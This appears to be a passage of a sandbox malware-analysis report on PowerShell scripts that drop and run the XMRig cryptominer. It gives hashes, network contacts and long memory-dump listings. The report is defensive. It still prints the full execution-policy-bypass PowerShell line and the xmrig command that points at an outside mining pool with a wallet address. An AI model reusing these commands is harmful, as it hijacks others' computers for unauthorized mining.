| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/5112-0-0x00007FFE3EE63000-0x00007FFE3EE65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x54asuax.goe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5112-10-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-11-0x000002105D960000-0x000002105D982000-memory.dmp
memory/5112-12-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-14-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-15-0x000002105D9F0000-0x000002105DA02000-memory.dmp
memory/5112-16-0x000002105D9E0000-0x000002105D9EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2640-47-0x00000157306E0000-0x0000015730700000-memory.dmp
memory/2640-48-0x0000015730720000-0x0000015730740000-memory.dmp
memory/2640-49-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-53-0x0000015730740000-0x0000015730760000-memory.dmp
memory/2640-52-0x0000015730760000-0x0000015730780000-memory.dmp
memory/2640-50-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/5112-51-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/5112-54-0x00007FFE3EE63000-0x00007FFE3EE65000-memory.dmp
memory/2640-55-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/5112-56-0x00007FFE3EE60000-0x00007FFE3F921000-memory.dmp
memory/2640-57-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-59-0x0000015730740000-0x0000015730760000-memory.dmp
memory/2640-58-0x0000015730760000-0x0000015730780000-memory.dmp
memory/2640-60-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-61-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-62-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-63-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-64-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-65-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-66-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-67-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-68-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-69-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-70-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-71-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-72-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-73-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-74-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-75-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-76-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-77-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-78-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-79-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-80-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-81-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-82-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-83-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-84-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-85-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-86-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-87-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-88-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-89-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-90-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-91-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-92-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-93-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-94-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-95-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-96-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-97-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-98-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-99-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-100-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-101-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-102-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-103-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-104-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-105-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-106-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-107-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-108-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-109-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-110-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-111-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-112-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-113-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-114-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-115-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-116-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-117-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
memory/2640-118-0x00007FF7D57E0000-0x00007FF7D6413000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:19
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 736 wrote to memory of 2904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 736 wrote to memory of 2904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/736-0-0x00007FF950D53000-0x00007FF950D55000-memory.dmp
memory/736-1-0x00000138AC820000-0x00000138AC842000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wp20rj5i.s0o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/736-11-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/736-12-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/736-14-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/736-15-0x00000138AD5E0000-0x00000138AD5F2000-memory.dmp
memory/736-16-0x00000138AC870000-0x00000138AC87A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2904-47-0x000001DF1BB40000-0x000001DF1BB60000-memory.dmp
memory/2904-48-0x000001DF1BB90000-0x000001DF1BBB0000-memory.dmp
memory/2904-49-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-52-0x000001DF1BBD0000-0x000001DF1BBF0000-memory.dmp
memory/2904-51-0x000001DF1BBB0000-0x000001DF1BBD0000-memory.dmp
memory/2904-50-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/736-53-0x00007FF950D53000-0x00007FF950D55000-memory.dmp
memory/736-54-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/2904-55-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/736-56-0x00007FF950D50000-0x00007FF951811000-memory.dmp
memory/2904-59-0x000001DF1BBD0000-0x000001DF1BBF0000-memory.dmp
memory/2904-58-0x000001DF1BBB0000-0x000001DF1BBD0000-memory.dmp
memory/2904-57-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-60-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-61-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-62-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-63-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-64-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-65-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-66-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-67-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-68-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-69-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-70-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-71-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-72-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-73-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-74-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-75-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-76-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-77-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-78-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-79-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-80-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-81-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-82-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-83-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-84-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-85-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-86-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-87-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-88-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-89-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-90-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-91-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-92-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-93-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-94-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-95-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-96-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-97-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-98-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-99-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-100-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-101-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-102-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-103-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-104-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-105-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-106-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-107-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-108-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-109-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-110-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-111-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-112-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-113-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-114-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-115-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-116-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-117-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
memory/2904-118-0x00007FF793AD0000-0x00007FF794703000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:21
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4536 wrote to memory of 4564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4536 wrote to memory of 4564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/4536-3-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp
memory/4536-5-0x000002266F6C0000-0x000002266F6E2000-memory.dmp
memory/4536-8-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4536-9-0x000002266F9A0000-0x000002266FA16000-memory.dmp
memory/4536-10-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lbtuaadq.dhw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4536-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4536-61-0x000002266F980000-0x000002266F98A000-memory.dmp
memory/4536-48-0x000002266FC20000-0x000002266FC32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4564-90-0x000002B925120000-0x000002B925140000-memory.dmp
memory/4536-91-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4536-93-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp
memory/4564-92-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4536-94-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp
memory/4564-95-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-96-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-97-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-98-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-99-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-100-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-101-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-102-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-103-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-104-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-105-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-106-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-107-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-108-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
memory/4564-109-0x00007FF678BF0000-0x00007FF679823000-memory.dmp
